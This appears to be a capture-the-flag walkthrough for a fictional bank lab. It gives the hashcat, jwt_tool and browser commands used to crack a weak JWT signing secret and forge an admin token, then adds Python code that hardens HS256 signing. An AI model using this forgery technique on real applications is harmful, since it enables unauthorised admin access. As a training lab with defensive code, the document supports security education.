HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Session Token — FirstBank

JWT Attacks · Weak JWT Secret / Token Forgery
Difficulty: Intermediate
Vuln class: Weak JWT Secret / Token Forgery
Steps: 5
// Objective
Crack the weak secret used to sign FirstBank's JWTs, then forge a new token with admin privileges to access the admin panel and retrieve the flag.
// Tools required
hashcat · jwt_tool · Browser · Developer Tools
// Step-by-step walkthrough
1. Extract your JWT
Log in to FirstBank. Open DevTools → Application → Local Storage (or Cookies). Find the session token. It will be a JWT: three base64url-encoded segments separated by dots.
Command / Input
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiIyMDAwMSIsInJvbGUiOiJ1c2VyIn0.xK2l...
You can decode the header and payload without the secret — they are just base64. Only the signature requires the secret to verify or forge.
2. Decode the payload
Decode the middle segment to see the claims inside your token. JWT segments omit the trailing "=" padding, so it is added back below for base64 -d.
Command / Input
echo "eyJ1c2VySWQiOiIyMDAwMSIsInJvbGUiOiJ1c2VyIn0=" | base64 -d
Output
{"userId":"20001","role":"user"}
Your goal is to change "role":"user" to "role":"admin" and sign the modified token with the cracked secret.
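3. Crack the signing secret with hashcat
An HS256 signature is an HMAC-SHA256 over the header and payload, so anyone holding a single token can test candidate secrets offline; if the secret is weak, it can be cracked. Run hashcat against the full token using a common wordlist.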
Command / Input
hashcat -a 0 -m 16500 \
  eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiIyMDAwMSIsInJvbGUiOiJ1c2VyIn0.xK2l... \
  /usr/share/wordlists/rockyou.txt
Output
eyJhbG...xK2l...:bankSecret2024
Status: Cracked
The secret "bankSecret2024" was in the rockyou wordlist. A proper secret should be 32+ random bytes.
4. Forge an admin token
Use jwt_tool to create a new token with role:admin, signed with the cracked secret.
Command / Input
python3 jwt_tool.py <original_token> -T -S hs256 -p "bankSecret2024"
Output
Modified claim: role → admin
New token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiIyMDAwMSIsInJvbGUiOiJhZG1pbiJ9.abc...
5. Use the forged token
Replace your session token in DevTools with the forged one. Reload the page and navigate to /admin.
Command / Input
localStorage.setItem("token", "<forged_token>")
Output
Admin panel unlocked. Flag: HackrGG{f1rstb4nk_jwt_f0rg3d_4dm1n}
// Flag
Flag value
HackrGG{f1rstb4nk_jwt_f0rg3d_4dm1n}
Displayed in the FirstBank admin panel after accessing it with a forged JWT.
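
Step 3 notes that a proper secret should be 32+ random bytes. The block below is an added example, not FirstBank's or hackr.gg's code: a standard-library HS256 signer and verifier that refuses short keys, pins the algorithm, and rejects a token tagged with the old weak secret once the server key is random. All function names and the demo values are constructed for illustration.

```python
import base64, hashlib, hmac, json, secrets

MIN_KEY_BYTES = 32  # RFC 7518 section 3.2: HS256 needs a key of at least 256 bits

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(seg: str) -> bytes:
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))  # restore padding

def check_key(key: bytes) -> bytes:
    if len(key) < MIN_KEY_BYTES:  # fail closed: b"bankSecret2024" is only 14 bytes
        raise ValueError(f"HS256 key is {len(key)} bytes, need at least {MIN_KEY_BYTES}")
    return key

def hs256_tag(key: bytes, signing_input: str) -> bytes:
    return b64url(hmac.new(key, signing_input.encode(), hashlib.sha256).digest()).encode()

def sign(claims: dict, key: bytes) -> str:
    parts = ({"alg": "HS256", "typ": "JWT"}, claims)
    head, body = (b64url(json.dumps(p, separators=(",", ":")).encode()) for p in parts)
    return f"{head}.{body}.{hs256_tag(check_key(key), head + '.' + body).decode()}"

def verify(token: str, key: bytes) -> dict:
    check_key(key)
    try:
        head, body, sig = token.split(".")
        header = json.loads(b64url_decode(head))
    except ValueError:  # wrong segment count, bad base64 or bad JSON
        raise ValueError("malformed token") from None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        raise ValueError("unexpected alg")  # algorithm is pinned server-side
    if not hmac.compare_digest(sig.encode(), hs256_tag(key, f"{head}.{body}")):
        raise ValueError("bad signature")  # compared in constant time
    return json.loads(b64url_decode(body))

def demo() -> str:
    key = secrets.token_bytes(32)  # constructed server key: 32 random bytes
    head = sign({"userId": "20001", "role": "user"}, key).split(".")[0]
    body = b64url(b'{"userId":"20001","role":"admin"}')  # constructed admin claims
    forged = f"{head}.{body}.{hs256_tag(b'bankSecret2024', head + '.' + body).decode()}"
    try:
        verify(forged, key)
        return "accepted"
    except ValueError as exc:
        return str(exc)

if __name__ == "__main__":
    print(demo())  # bad signature
```
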